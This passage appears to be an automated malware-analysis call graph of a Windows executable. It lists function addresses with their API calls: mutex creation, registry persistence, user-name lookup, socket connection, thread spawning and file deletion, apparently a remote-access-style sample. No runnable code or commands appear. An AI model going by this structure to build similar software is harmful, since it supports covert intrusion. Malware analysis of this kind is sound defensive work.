78 API calls 65328->66016 65332 40e9d0 66017 40f2fe 71 API calls 65332->66017 65336 401fd8 11 API calls 65337 40ea40 65336->65337 65339 401fd8 11 API calls 65337->65339 65338 401fd8 11 API calls 65340 40ee49 65338->65340 65341 40ea49 65339->65341 65579 443255 GetModuleHandleW 65340->65579 65342 401e65 22 API calls 65341->65342 65343 40ea52 65342->65343 65779 401fc0 65343->65779 65345 40ea5d 65346 401e65 22 API calls 65345->65346 65347 40ea76 65346->65347 65348 401e65 22 API calls 65347->65348 65349 40ea91 65348->65349 65350 40eafc 65349->65350 66018 406c1e 65349->66018 65351 401e65 22 API calls 65350->65351 65358 40eb09 65351->65358 65353 40eabe 65354 401fe2 28 API calls 65353->65354 65355 40eaca 65354->65355 65356 401fd8 11 API calls 65355->65356 65359 40ead3 65356->65359 65357 40eb50 65783 40cfb7 65357->65783 65358->65357 65362 413497 3 API calls 65358->65362 66023 413497 RegOpenKeyExA 65359->66023 65361 40eb56 65363 40e9d9 65361->65363 65786 41b211 65361->65786 65369 40eb34 65362->65369 65363->65338 65367 40eb71 65370 40ebc4 65367->65370 65803 407716 65367->65803 65368 40f29d 66101 4138f7 30 API calls 65368->66101 65369->65357 66026 4138f7 30 API calls 65369->66026 65372 401e65 22 API calls 65370->65372 65380 40ebcd 65372->65380 65376 40f2b3 66102 4123c3 65 API calls ___scrt_fastfail 65376->66102 65377 40eb90 66027 407738 30 API calls 65377->66027 65378 40eb9a 65382 401e65 22 API calls 65378->65382 65384 40ebd9 65380->65384 65385 40ebde 65380->65385 65393 40eba3 65382->65393 65383 40f2bd 65387 41bbac 28 API calls 65383->65387 66030 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 65384->66030 65391 401e65 22 API calls 65385->65391 65386 40eb95 66028 407260 98 API calls 65386->66028 65388 40f2cd 65387->65388 65913 413971 RegOpenKeyExW 65388->65913 65392 40ebe7 65391->65392 65807 41bbac 65392->65807 65393->65370 65398 40ebbf 65393->65398 65395 40ebf2 65811 401f13 65395->65811 66029 407260 98 API calls 65398->66029 65402 401f09 11 API calls 65404 40f2ea 65402->65404 65406 401f09 11 API calls 65404->65406 65408 40f2f3 65406->65408 65407 401e65 22 API calls 65409 40ec0f 65407->65409 65916 40dc90 65408->65916 65413 401e65 22 API calls 65409->65413 65415 40ec29 65413->65415 65414 40f2fd 65416 401e65 22 API calls 65415->65416 65417 40ec43 65416->65417 65418 401e65 22 API calls 65417->65418 65419 40ec5c 65418->65419 65420 40ecc9 65419->65420 65421 401e65 22 API calls 65419->65421 65422 40ecd8 65420->65422 65428 40ee54 ___scrt_fastfail 65420->65428 65426 40ec71 _wcslen 65421->65426 65423 40ece1 65422->65423 65449 40ed5d ___scrt_fastfail 65422->65449 65424 401e65 22 API calls 65423->65424 65425 40ecea 65424->65425 65427 401e65 22 API calls 65425->65427 65426->65420 65430 401e65 22 API calls 65426->65430 65429 40ecfc 65427->65429 66091 413646 RegOpenKeyExA 65428->66091 65433 401e65 22 API calls 65429->65433 65431 40ec8c 65430->65431 65434 401e65 22 API calls 65431->65434 65435 40ed0e 65433->65435 65436 40eca1 65434->65436 65438 401e65 22 API calls 65435->65438 66031 40d982 65436->66031 65437 40ee9f 65439 401e65 22 API calls 65437->65439 65441 40ed37 65438->65441 65442 40eec4 65439->65442 65447 401e65 22 API calls 65441->65447 65833 402093 65442->65833 65444 401f13 28 API calls 65446 40ecc0 65444->65446 65450 401f09 11 API calls 65446->65450 65451 40ed48 65447->65451 65448 40eed6 65839 4136bd RegCreateKeyA 65448->65839 65823 413895 65449->65823 65450->65420 66089 40cd47 45 API calls _wcslen 65451->66089 65455 40ed58 65455->65449 65457 40edf1 ctype 65460 401e65 22 API calls 65457->65460 65458 401e65 22 API calls 65459 40eef8 65458->65459 65845 43b9ec 65459->65845 65461 40ee08 65460->65461 65461->65437 65464 40ee1c 65461->65464 65467 401e65 22 API calls 65464->65467 65465 40ef0f 66094 41cce9 87 API calls ___scrt_fastfail 65465->66094 65466 40ef32 65471 402093 28 API calls 65466->65471 65469 40ee25 65467->65469 65472 41bbac 28 API calls 65469->65472 65470 40ef16 CreateThread 65470->65466 66689 41d3ab 10 API calls 65470->66689 65473 40ef47 65471->65473 65474 40ee31 65472->65474 65475 402093 28 API calls 65473->65475 66090 40f3c2 104 API calls 65474->66090 65477 40ef56 65475->65477 65849 41b43d 65477->65849 65478 40ee36 65478->65437 65480 40ee3d 65478->65480 65480->65363 65482 401e65 22 API calls 65483 40ef67 65482->65483 65484 401e65 22 API calls 65483->65484 65485 40ef79 65484->65485 65486 401e65 22 API calls 65485->65486 65487 40ef99 65486->65487 65488 43b9ec _strftime 40 API calls 65487->65488 65489 40efa6 65488->65489 65490 401e65 22 API calls 65489->65490 65491 40efb1 65490->65491 65492 401e65 22 API calls 65491->65492 65493 40efc2 65492->65493 65494 401e65 22 API calls 65493->65494 65495 40efd7 65494->65495 65496 401e65 22 API calls 65495->65496 65497 40efe8 65496->65497 65498 40efef StrToIntA 65497->65498 65873 409de4 65498->65873 65501 401e65 22 API calls 65502 40f00a 65501->65502 65503 40f016 65502->65503 65504 40f04f 65502->65504 66095 434438 22 API calls 2 library calls 65503->66095 65507 401e65 22 API calls 65504->65507 65506 40f01f 65508 401e65 22 API calls 65506->65508 65509 40f05f 65507->65509 65510 40f032 65508->65510 65512 40f0a7 65509->65512 65513 40f06b 65509->65513 65511 40f039 CreateThread 65510->65511 65511->65504 66687 419f02 103 API calls 2 library calls 65511->66687 65514 401e65 22 API calls 65512->65514 66096 434438 22 API calls 2 library calls 65513->66096 65516 40f0b0 65514->65516 65520 40f11a 65516->65520 65521 40f0bc 65516->65521 65517 40f074 65518 401e65 22 API calls 65517->65518 65519 40f086 65518->65519 65522 40f08d CreateThread 65519->65522 65523 401e65 22 API calls 65520->65523 65524 401e65 22 API calls 65521->65524 65522->65512 66686 419f02 103 API calls 2 library calls 65522->66686 65527 40f123 65523->65527 65525 40f0cc 65524->65525 65528 401e65 22 API calls 65525->65528 65526 40f168 65898 41b55b 65526->65898 65527->65526 65530 401e65 22 API calls 65527->65530 65531 40f0e1 65528->65531 65533 40f138 65530->65533 66097 40d936 31 API calls 65531->66097 65537 401e65 22 API calls 65533->65537 65534 401f13 28 API calls 65536 40f17c 65534->65536 65539 401f09 11 API calls 65536->65539 65540 40f14d 65537->65540 65538 40f0f4 65541 401f13 28 API calls 65538->65541 65542 40f185 65539->65542 65551 43b9ec _strftime 40 API calls 65540->65551 65545 40f100 65541->65545 65543 40f191 CreateThread 65542->65543 65544 40f18e SetProcessDEPPolicy 65542->65544 65546 40f1b2 65543->65546 65547 40f1a6 CreateThread 65543->65547 66658 40f6f5 65543->66658 65544->65543 65548 401f09 11 API calls 65545->65548 65549 40f1c7 65546->65549 65550 40f1bb CreateThread 65546->65550 65547->65546 66688 412045 124 API calls 65547->66688 65552 40f109 CreateThread 65548->65552 65554 40f21a 65549->65554 65556 402093 28 API calls 65549->65556 65550->65549 66690 412629 38 API calls ___scrt_fastfail 65550->66690 65553 40f15a 65551->65553 65552->65520 66685 401be9 50 API calls _strftime 65552->66685 66098 40c0b0 6 API calls 65553->66098 65910 41344d RegOpenKeyExA 65554->65910 65557 40f1ea 65556->65557 66099 4052fd 28 API calls 65557->66099 65562 40f23b 65564 41bbac 28 API calls 65562->65564 65567 40f24b 65564->65567 66100 413569 31 API calls 65567->66100 65571 40f261 65572 401f09 11 API calls 65571->65572 65575 40f26c 65572->65575 65573 40f294 DeleteFileW 65574 40f29b 65573->65574 65573->65575 65574->65383 65575->65383 65575->65573 65576 40f282 Sleep 65575->65576 65576->65575 65577->65248 65578->65255 65579->65265 65580->65266 65581->65268 65582->65271 65583->65275 65584->65277 65589 44faa9 65585->65589 65588 438e9a 8 API calls 3 library calls 65588->65278 65592 44fac2 65589->65592 65591 43450b 65591->65281 65591->65588 65593 434f2b 65592->65593 65594 434f36 IsProcessorFeaturePresent 65593->65594 65595 434f34 65593->65595 65597 434f78 65594->65597 65595->65591 65600 434f3c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65597->65600 65599 43505b 65599->65591 65600->65599 65602 436de7 65601->65602 65602->65293 65602->65602 65604 44ef2b 65603->65604 65605 44ef22 65603->65605 65604->65298 65608 44ee18 65605->65608 65607->65298 65628 4480d5 GetLastError 65608->65628 65610 44ee25 65648 44ef37 65610->65648 65612 44ee2d 65657 44ebac 65612->65657 65618 44ee7a 65620 44ee82 65618->65620 65624 44ee9f 65618->65624 65672 44051d 20 API calls __dosmaperr 65620->65672 65621 44ee44 65621->65604 65623 44eecb 65627 44ee87 65623->65627 65679 44ea82 20 API calls 65623->65679 65624->65623 65625 446642 _free 20 API calls 65624->65625 65625->65623 65673 446642 65627->65673 65629 4480f1 65628->65629 65630 4480eb 65628->65630 65634 448140 SetLastError 65629->65634 65681 445a33 65629->65681 65680 44867c 11 API calls 2 library calls 65630->65680 65634->65610 65635 44810b 65637 446642 _free 20 API calls 65635->65637 65639 448111 65637->65639 65638 448120 65638->65635 65640 448127 65638->65640 65641 44814c SetLastError 65639->65641 65689 447f47 20 API calls __dosmaperr 65640->65689 65690 446034 36 API calls 4 library calls 65641->65690 65643 448132 65645 446642 _free 20 API calls 65643->65645 65647 448139 65645->65647 65646 448158 65647->65634 65647->65641 65649 44ef43 CallCatchBlock 65648->65649 65650 4480d5 __Getctype 36 API calls 65649->65650 65655 44ef4d 65650->65655 65652 44efd1 CallCatchBlock 65652->65612 65655->65652 65656 446642 _free 20 API calls 65655->65656 65693 446034 36 API calls 4 library calls 65655->65693 65694 4457c8 EnterCriticalSection 65655->65694 65695 44efc8 LeaveCriticalSection std::_Lockit::~_Lockit 65655->65695 65656->65655 65696 43a6f7 65657->65696 65660 44ebcd GetOEMCP 65663 44ebf6 65660->65663 65661 44ebdf 65662 44ebe4 GetACP 65661->65662 65661->65663 65662->65663 65663->65621 65664 446077 65663->65664 65665 4460b5 65664->65665 65669 446085 ___crtLCMapStringA 65664->65669 65707 44051d 20 API calls __dosmaperr 65665->65707 65667 4460a0 RtlAllocateHeap 65668 4460b3 65667->65668 65667->65669 65668->65627 65671 44efd9 49 API calls 2 library calls 65668->65671 65669->65665 65669->65667 65706 442ec0 7 API calls 2 library calls 65669->65706 65671->65618 65672->65627 65674 44664d RtlFreeHeap 65673->65674 65675 446676 __dosmaperr 65673->65675 65674->65675 65676 446662 65674->65676 65675->65621 65708 44051d 20 API calls __dosmaperr 65676->65708 65678 446668 GetLastError 65678->65675 65679->65627 65680->65629 65687 445a40 ___crtLCMapStringA 65681->65687 65682 445a80 65692 44051d 20 API calls __dosmaperr 65682->65692 65683 445a6b RtlAllocateHeap 65684 445a7e 65683->65684 65683->65687 65684->65635 65688 4486d2 11 API calls 2 library calls 65684->65688 65687->65682 65687->65683 65691 442ec0 7 API calls 2 library calls 65687->65691 65688->65638 65689->65643 65690->65646 65691->65687 65692->65684 65693->65655 65694->65655 65695->65655 65697 43a714 65696->65697 65703 43a70a 65696->65703 65698 4480d5 __Getctype 36 API calls 65697->65698 65697->65703 65699 43a735 65698->65699 65704 448224 36 API calls __Getctype 65699->65704 65701 43a74e 65705 448251 36 API calls __cftoe 65701->65705 65703->65660 65703->65661 65704->65701 65705->65703 65706->65669 65707->65668 65708->65678 65710 41cadd LoadLibraryA GetProcAddress 65709->65710 65711 41cacd GetModuleHandleA GetProcAddress 65709->65711 65712 41cb06 44 API calls 65710->65712 65713 41caf6 LoadLibraryA GetProcAddress 65710->65713 65711->65710 65712->65302 65713->65712 66103 41b3f6 FindResourceA 65714->66103 65717 43bc91 new 21 API calls 65718 40f33b ctype 65717->65718 65719 4020b7 28 API calls 65718->65719 65720 40f356 65719->65720 65721 401fe2 28 API calls 65720->65721 65722 40f361 65721->65722 65723 401fd8 11 API calls 65722->65723 65724 40f36a 65723->65724 65725 43bc91 new 21 API calls 65724->65725 65726 40f37b ctype 65725->65726 66106 406dd8 65726->66106 65728 40f3ae 65728->65304 65730 4020df 11 API calls 65729->65730 65750 41bd7c 65730->65750 65731 41bdec 65732 401fd8 11 API calls 65731->65732 65733 41be1e 65732->65733 65735 401fd8 11 API calls 65733->65735 65734 41bdee 65736 4041a2 28 API calls 65734->65736 65738 41be26 65735->65738 65740 41bdfa 65736->65740 65739 401fd8 11 API calls 65738->65739 65741 40e972 65739->65741 65742 401fe2 28 API calls 65740->65742 65751 40fa65 65741->65751 65744 41be03 65742->65744 65743 401fe2 28 API calls 65743->65750 65745 401fd8 11 API calls 65744->65745 65747 41be0b 65745->65747 65746 401fd8 11 API calls 65746->65750 66113 41cd82 28 API calls 65747->66113 65750->65731 65750->65734 65750->65743 65750->65746 66109 4041a2 65750->66109 66112 41cd82 28 API calls 65750->66112 65752 40fa71 65751->65752 65754 40fa78 65751->65754 66120 402163 11 API calls 65752->66120 65754->65312 65756 401e6d 65755->65756 65757 401e75 65756->65757 66121 402158 22 API calls 65756->66121 65757->65319 65761 4020df 11 API calls 65760->65761 65762 40532a 65761->65762 66122 4032a0 65762->66122 65764 405346 65764->65327 66127 4051ef 65765->66127 65767 406391 66131 402055 65767->66131 65770 401fe2 65771 401ff1 65770->65771 65778 402039 65770->65778 65772 4023ce 11 API calls 65771->65772 65773 401ffa 65772->65773 65774 40203c 65773->65774 65776 402015 65773->65776 65775 40267a 11 API calls 65774->65775 65775->65778 66165 403098 28 API calls 65776->66165 65778->65336 65780 401fd2 65779->65780 65781 401fc9 65779->65781 65780->65345 66166 4025e0 28 API calls 65781->66166 66167 401fab 65783->66167 65785 40cfc1 CreateMutexA GetLastError 65785->65361 66168 41bf05 65786->66168 65791 401fe2 28 API calls 65792 41b24d 65791->65792 65793 401fd8 11 API calls 65792->65793 65794 41b255 65793->65794 65795 4134f4 31 API calls 65794->65795 65797 41b2ab 65794->65797 65796 41b27e 65795->65796 65798 41b289 StrToIntA 65796->65798 65797->65367 65799 41b2a0 65798->65799 65800 41b297 65798->65800 65802 401fd8 11 API calls 65799->65802 66176 41ceb7 22 API calls 65800->66176 65802->65797 65804 40772a 65803->65804 65805 413497 3 API calls 65804->65805 65806 407731 65805->65806 65806->65377 65806->65378 65808 41bbc0 65807->65808 66177 40b852 65808->66177 65810 41bbc8 65810->65395 65812 401f22 65811->65812 65819 401f6a 65811->65819 65813 402252 11 API calls 65812->65813 65814 401f2b 65813->65814 65815 401f6d 65814->65815 65817 401f46 65814->65817 66210 402336 65815->66210 66209 40305c 28 API calls 65817->66209 65820 401f09 65819->65820 65821 402252 11 API calls 65820->65821 65822 401f12 65821->65822 65822->65407 65824 4138b3 65823->65824 65825 406dd8 28 API calls 65824->65825 65826 4138c8 65825->65826 65827 4020f6 28 API calls 65826->65827 65828 4138d8 65827->65828 65829 4136bd 14 API calls 65828->65829 65830 4138e2 65829->65830 65831 401fd8 11 API calls 65830->65831 65832 4138ef 65831->65832 65832->65457 65834 40209b 65833->65834 65835 4023ce 11 API calls 65834->65835 65836 4020a6 65835->65836 66214 4024ed 65836->66214 65840 41370d 65839->65840 65841 4136d6 65839->65841 65842 401fd8 11 API calls 65840->65842 65844 4136e8 RegSetValueExA RegCloseKey 65841->65844 65843 40eeec 65842->65843 65843->65458 65844->65840 65846 43ba05 _strftime 65845->65846 66218 43ad43 65846->66218 65848 40ef05 65848->65465 65848->65466 65850 41b453 GetLocalTime 65849->65850 65851 41b4ee 65849->65851 65853 40531e 28 API calls 65850->65853 65852 401fd8 11 API calls 65851->65852 65854 41b4f6 65852->65854 65855 41b495 65853->65855 65856 401fd8 11 API calls 65854->65856 65857 406383 28 API calls 65855->65857 65858 40ef5b 65856->65858 65859 41b4a1 65857->65859 65858->65482 66245 402f10 65859->66245 65862 406383 28 API calls 65863 41b4b9 65862->65863 66250 407200 77 API calls 65863->66250 65865 41b4c7 65866 401fd8 11 API calls 65865->65866 65867 41b4d3 65866->65867 65868 401fd8 11 API calls 65867->65868 65869 41b4dc 65868->65869 65870 401fd8 11 API calls 65869->65870 65871 41b4e5 65870->65871 65872 401fd8 11 API calls 65871->65872 65872->65851 65874 409e02 _wcslen 65873->65874 65875 409e24 65874->65875 65876 409e0d 65874->65876 65878 40d982 31 API calls 65875->65878 65877 40d982 31 API calls 65876->65877 65879 409e15 65877->65879 65880 409e2c 65878->65880 65881 401f13 28 API calls 65879->65881 65882 401f13 28 API calls 65880->65882 65885 409e1f 65881->65885 65883 409e3a 65882->65883 65884 401f09 11 API calls 65883->65884 65886 409e42 65884->65886 65887 401f09 11 API calls 65885->65887 66267 40915b 28 API calls 65886->66267 65889 409e79 65887->65889 66254 40a109 65889->66254 65890 409e54 66268 403014 65890->66268 65895 401f13 28 API calls 65896 409e69 65895->65896 65897 401f09 11 API calls 65896->65897 65897->65885 65899 41b57e GetUserNameW 65898->65899 66318 40417e 65899->66318 65904 403014 28 API calls 65905 41b5c0 65904->65905 65906 401f09 11 API calls 65905->65906 65907 41b5c9 65906->65907 65908 401f09 11 API calls 65907->65908 65909 40f171 65908->65909 65909->65534 65911 40f232 65910->65911 65912 41346e RegQueryValueExA RegCloseKey 65910->65912 65911->65408 65911->65562 65912->65911 65914 41398d RegDeleteValueW 65913->65914 65915 40f2e0 65913->65915 65914->65915 65915->65402 65917 40dca9 65916->65917 65918 41344d 3 API calls 65917->65918 65919 40dcb0 65918->65919 65923 40dccf 65919->65923 66410 401707 65919->66410 65921 40dcbd 66413 4137c5 RegCreateKeyA 65921->66413 65924 414e78 65923->65924 65925 4020df 11 API calls 65924->65925 65926 414e8c 65925->65926 66427 41b801 65926->66427 65929 4020df 11 API calls 65930 414ea2 65929->65930 65931 401e65 22 API calls 65930->65931 65932 414eb0 65931->65932 65933 43b9ec _strftime 40 API calls 65932->65933 65934 414ebd 65933->65934 65935 414ec2 Sleep 65934->65935 65936 414ecf 65934->65936 65935->65936 65937 402093 28 API calls 65936->65937 65938 414ede 65937->65938 65939 401e65 22 API calls 65938->65939 65940 414ee7 65939->65940 65941 4020f6 28 API calls 65940->65941 65942 414ef2 65941->65942 65943 41bd69 28 API calls 65942->65943 65944 414efa 65943->65944 66431 40489e WSAStartup 65944->66431 65946 414f04 65947 401e65 22 API calls 65946->65947 65948 414f0d 65947->65948 65949 401e65 22 API calls 65948->65949 66011 414f8c 65948->66011 65950 414f26 65949->65950 65951 401e65 22 API calls 65950->65951 65953 414f37 65951->65953 65952 4020f6 28 API calls 65952->66011 65955 401e65 22 API calls 65953->65955 65954 41bd69 28 API calls 65954->66011 65956 414f48 65955->65956 65958 401e65 22 API calls 65956->65958 65957 406c1e 28 API calls 65957->66011 65959 414f59 65958->65959 65960 401e65 22 API calls 65959->65960 65962 414f6a 65960->65962 65961 401fe2 28 API calls 65961->66011 65963 401e65 22 API calls 65962->65963 65964 414f7c 65963->65964 66577 40473d 89 API calls 65964->66577 65967 4150da WSAGetLastError 66578 41ca2f 30 API calls 65967->66578 65971 402093 28 API calls 65973 4150ea 65971->65973 65973->65971 65975 41b43d 80 API calls 65973->65975 65979 401e8d 11 API calls 65973->65979 65980 401e65 22 API calls 65973->65980 65981 43b9ec _strftime 40 API calls 65973->65981 65973->66011 66012 401fd8 11 API calls 65973->66012 66013 401f09 11 API calls 65973->66013 66579 4052fd 28 API calls 65973->66579 66580 40af9f 85 API calls 65973->66580 66581 404e26 99 API calls 65973->66581 65975->65973 65977 401e65 22 API calls 65977->66011 65978 40531e 28 API calls 65978->66011 65979->65973 65980->65973 65983 415a1d Sleep 65981->65983 65982 406383 28 API calls 65982->66011 65983->65973 65986 40905c 28 API calls 65986->66011 65988 413646 3 API calls 65988->66011 65989 4134f4 31 API calls 65989->66011 65990 40417e 28 API calls 65990->66011 65993 401e65 22 API calls 65994 415387 GetTickCount 65993->65994 66539 41badc 65994->66539 65997 41badc 28 API calls 65997->66011 66000 41bc6c 28 API calls 66000->66011 66002 402f10 28 API calls 66002->66011 66003 402ea1 28 API calls 66003->66011 66004 404aa1 61 API calls 66004->66011 66005 401fd8 11 API calls 66005->66011 66006 401f09 11 API calls 66006->66011 66009 402093 28 API calls 66009->66011 66010 41b43d 80 API calls 66010->66011 66011->65952 66011->65954 66011->65957 66011->65961 66011->65967 66011->65973 66011->65977 66011->65978 66011->65982 66011->65986 66011->65988 66011->65989 66011->65990 66011->65993 66011->65997 66011->66000 66011->66002 66011->66003 66011->66004 66011->66005 66011->66006 66011->66009 66011->66010 66432 414e37 66011->66432 66438 40482d 66011->66438 66445 404f51 66011->66445 66460 4048c8 connect 66011->66460 66520 41b72e 66011->66520 66523 41450b 66011->66523 66526 441dc1 66011->66526 66530 40dcd7 66011->66530 66536 41bb90 66011->66536 66544 41ba34 66011->66544 66546 41b9e4 66011->66546 66551 40f81f GetLocaleInfoA 66011->66551 66554 402f31 66011->66554 66559 404c10 66011->66559 66012->65973 66013->65973 66014->65320 66015->65328 66016->65332 66019 4020df 11 API calls 66018->66019 66020 406c2a 66019->66020 66021 4032a0 28 API calls 66020->66021 66022 406c47 66021->66022 66022->65353 66024 4134c1 RegQueryValueExA RegCloseKey 66023->66024 66025 40eaf2 66023->66025 66024->66025 66025->65350 66025->65368 66026->65357 66027->65386 66028->65378 66029->65370 66030->65385 66648 401f86 66031->66648 66034 40d9f3 66037 41bf05 GetCurrentProcess 66034->66037 66035 40d9be 66652 41b502 29 API calls 66035->66652 66036 40dae7 GetLongPathNameW 66040 40417e 28 API calls 66036->66040 66041 40d9f8 66037->66041 66039 40d9c7 66042 401f13 28 API calls 66039->66042 66043 40dafc 66040->66043 66044 40d9fc 66041->66044 66045 40da4e 66041->66045 66046 40d9d1 66042->66046 66048 40417e 28 API calls 66043->66048 66050 40417e 28 API calls 66044->66050 66049 40417e 28 API calls 66045->66049 66054 401f09 11 API calls 66046->66054 66047 40d9b4 66047->66036 66051 40db0b 66048->66051 66052 40da5c 66049->66052 66053 40da0a 66050->66053 66655 40dd1f 28 API calls 66051->66655 66059 40417e 28 API calls 66052->66059 66057 40417e 28 API calls 66053->66057 66054->66047 66056 40db1e 66656 402fa5 28 API calls 66056->66656 66061 40da20 66057->66061 66060 40da72 66059->66060 66654 402fa5 28 API calls 66060->66654 66653 402fa5 28 API calls 66061->66653 66062 40db29 66657 402fa5 28 API calls 66062->66657 66066 40db33 66069 401f09 11 API calls 66066->66069 66067 40da7d 66070 401f13 28 API calls 66067->66070 66068 40da2b 66071 401f13 28 API calls 66068->66071 66072 40db3d 66069->66072 66073 40da88 66070->66073 66074 40da36 66071->66074 66075 401f09 11 API calls 66072->66075 66076 401f09 11 API calls 66073->66076 66077 401f09 11 API calls 66074->66077 66078 40db46 66075->66078 66079 40da91 66076->66079 66080 40da3f 66077->66080 66081 401f09 11 API calls 66078->66081 66082 401f09 11 API calls 66079->66082 66083 401f09 11 API calls 66080->66083 66084 40db4f 66081->66084 66082->66046 66083->66046 66085 401f09 11 API calls 66084->66085 66086 40db58 66085->66086 66087 401f09 11 API calls 66086->66087 66088 40db61 66087->66088 66088->65444 66089->65455 66090->65478 66092 41366c RegQueryValueExA RegCloseKey 66091->66092 66093 413690 66091->66093 66092->66093 66093->65437 66094->65470 66095->65506 66096->65517 66097->65538 66098->65526 66100->65571 66101->65376 66104 41b413 LoadResource LockResource SizeofResource 66103->66104 66105 40f32c 66103->66105 66104->66105 66105->65717 66107 4020b7 28 API calls 66106->66107 66108 406dec 66107->66108 66108->65728 66114 40423a 66109->66114 66112->65750 66113->65731 66115 404243 66114->66115 66116 4023ce 11 API calls 66115->66116 66117 40424e 66116->66117 66118 402569 28 API calls 66117->66118 66119 4041b5 66118->66119 66119->65750 66120->65754 66123 4032aa 66122->66123 66125 4032c9 66123->66125 66126 4028e8 28 API calls 66123->66126 66125->65764 66126->66125 66128 4051fb 66127->66128 66137 405274 66128->66137 66130 405208 66130->65767 66132 402061 66131->66132 66133 4023ce 11 API calls 66132->66133 66134 40207b 66133->66134 66161 40267a 66134->66161 66138 405282 66137->66138 66139 405288 66138->66139 66140 40529e 66138->66140 66148 4025f0 66139->66148 66142 4052f5 66140->66142 66143 4052b6 66140->66143 66158 4028a4 22 API calls std::_Xinvalid_argument 66142->66158 66147 40529c 66143->66147 66157 4028e8 28 API calls 66143->66157 66147->66130 66149 402888 22 API calls 66148->66149 66150 402602 66149->66150 66151 402672 66150->66151 66152 402629 66150->66152 66160 4028a4 22 API calls std::_Xinvalid_argument 66151->66160 66156 40263b 66152->66156 66159 4028e8 28 API calls 66152->66159 66156->66147 66157->66147 66159->66156 66162 40268b 66161->66162 66163 4023ce 11 API calls 66162->66163 66164 40208d 66163->66164 66164->65770 66165->65778 66166->65780 66169 41bf12 GetCurrentProcess 66168->66169 66170 41b21f 66168->66170 66169->66170 66171 4134f4 RegOpenKeyExA 66170->66171 66172 413522 RegQueryValueExA RegCloseKey 66171->66172 66173 41354c 66171->66173 66172->66173 66174 402093 28 API calls 66173->66174 66175 413561 66174->66175 66175->65791 66176->65799 66178 40b85a 66177->66178 66183 402252 66178->66183 66180 40b865 66187 40b87a 66180->66187 66182 40b874 66182->65810 66184 4022ac 66183->66184 66185 40225c 66183->66185 66184->66180 66185->66184 66194 402779 11 API calls std::_Deallocate 66185->66194 66188 40b8b4 66187->66188 66189 40b886 66187->66189 66206 4028a4 22 API calls std::_Xinvalid_argument 66188->66206 66195 4027e6 66189->66195 66193 40b890 66193->66182 66194->66184 66196 4027ef 66195->66196 66197 402851 66196->66197 66198 4027f9 66196->66198 66208 4028a4 22 API calls std::_Xinvalid_argument 66197->66208 66201 402802 66198->66201 66203 402815 66198->66203 66207 402aea 28 API calls __EH_prolog 66201->66207 66204 402813 66203->66204 66205 402252 11 API calls 66203->66205 66204->66193 66205->66204 66207->66204 66209->65819 66211 402347 66210->66211 66212 402252 11 API calls 66211->66212 66213 4023c7 66212->66213 66213->65819 66215 4024f9 66214->66215 66216 40250a 28 API calls 66215->66216 66217 4020b1 66216->66217 66217->65448 66234 43b94a 66218->66234 66220 43ad90 66221 43a6f7 __cftoe 36 API calls 66220->66221 66226 43ad9c 66221->66226 66222 43ad55 66222->66220 66223 43ad6a 66222->66223 66233 43ad6f __cftoe 66222->66233 66239 44051d 20 API calls __dosmaperr 66223->66239 66227 43adcb 66226->66227 66240 43b98f 40 API calls __Toupper 66226->66240 66230 43ae37 66227->66230 66241 43b8f6 20 API calls 2 library calls 66227->66241 66242 43b8f6 20 API calls 2 library calls 66230->66242 66231 43aefe _strftime 66231->66233 66243 44051d 20 API calls __dosmaperr 66231->66243 66233->65848 66235 43b962 66234->66235 66236 43b94f 66234->66236 66235->66222 66244 44051d 20 API calls __dosmaperr 66236->66244 66238 43b954 __cftoe 66238->66222 66239->66233 66240->66226 66241->66230 66242->66231 66243->66233 66244->66238 66251 401fb0 66245->66251 66247 402f1e 66248 402055 11 API calls 66247->66248 66249 402f2d 66248->66249 66249->65862 66250->65865 66252 4025f0 28 API calls 66251->66252 66253 401fbd 66252->66253 66253->66247 66255 40a127 66254->66255 66256 413497 3 API calls 66255->66256 66257 40a12e 66256->66257 66258 40a142 66257->66258 66259 40a15c 66257->66259 66266 409e9b 66258->66266 66273 40905c 66258->66273 66260 40905c 28 API calls 66259->66260 66262 40a16a 66260->66262 66280 40a179 86 API calls 66262->66280 66266->65501 66267->65890 66295 403222 66268->66295 66270 403022 66299 403262 66270->66299 66274 409072 66273->66274 66275 402252 11 API calls 66274->66275 66276 40908c 66275->66276 66281 404267 66276->66281 66278 40909a 66279 40a22d 28 API calls 66278->66279 66279->66266 66280->66266 66293 40a289 48 API calls 66280->66293 66294 40a27d 122 API calls 66280->66294 66282 402888 22 API calls 66281->66282 66283 40427b 66282->66283 66284 404290 66283->66284 66285 4042a5 66283->66285 66291 4042df 22 API calls 66284->66291 66286 4027e6 28 API calls 66285->66286 66290 4042a3 66286->66290 66288 404299 66292 402c48 22 API calls 66288->66292 66290->66278 66291->66288 66292->66290 66296 40322e 66295->66296 66305 403618 66296->66305 66298 40323b 66298->66270 66300 40326e 66299->66300 66301 402252 11 API calls 66300->66301 66302 403288 66301->66302 66303 402336 11 API calls 66302->66303 66304 403031 66303->66304 66304->65895 66306 403626 66305->66306 66307 403644 66306->66307 66308 40362c 66306->66308 66309 40365c 66307->66309 66310 40369e 66307->66310 66316 4036a6 28 API calls 66308->66316 66314 4027e6 28 API calls 66309->66314 66315 403642 66309->66315 66317 4028a4 22 API calls std::_Xinvalid_argument 66310->66317 66314->66315 66315->66298 66316->66315 66319 404186 66318->66319 66320 402252 11 API calls 66319->66320 66321 404191 66320->66321 66329 4041bc 66321->66329 66324 4042fc 66340 404353 66324->66340 66326 40430a 66327 403262 11 API calls 66326->66327 66328 404319 66327->66328 66328->65904 66330 4041c8 66329->66330 66333 4041d9 66330->66333 66332 40419c 66332->66324 66334 4041e9 66333->66334 66335 404206 66334->66335 66336 4041ef 66334->66336 66337 4027e6 28 API calls 66335->66337 66338 404267 28 API calls 66336->66338 66339 404204 66337->66339 66338->66339 66339->66332 66341 40435f 66340->66341 66344 404371 66341->66344 66343 40436d 66343->66326 66345 40437f 66344->66345 66346 404385 66345->66346 66347 40439e 66345->66347 66408 4034e6 28 API calls 66346->66408 66348 402888 22 API calls 66347->66348 66349 4043a6 66348->66349 66351 404419 66349->66351 66352 4043bf 66349->66352 66409 4028a4 22 API calls std::_Xinvalid_argument 66351->66409 66354 4027e6 28 API calls 66352->66354 66363 40439c 66352->66363 66354->66363 66363->66343 66408->66363 66416 43a9da 66410->66416 66414 413807 66413->66414 66415 4137dd RegSetValueExA RegCloseKey 66413->66415 66414->65923 66415->66414 66419 43a95b 66416->66419 66418 40170d 66418->65921 66420 43a96a 66419->66420 66421 43a97e 66419->66421 66425 44051d 20 API calls __dosmaperr 66420->66425 66424 43a96f 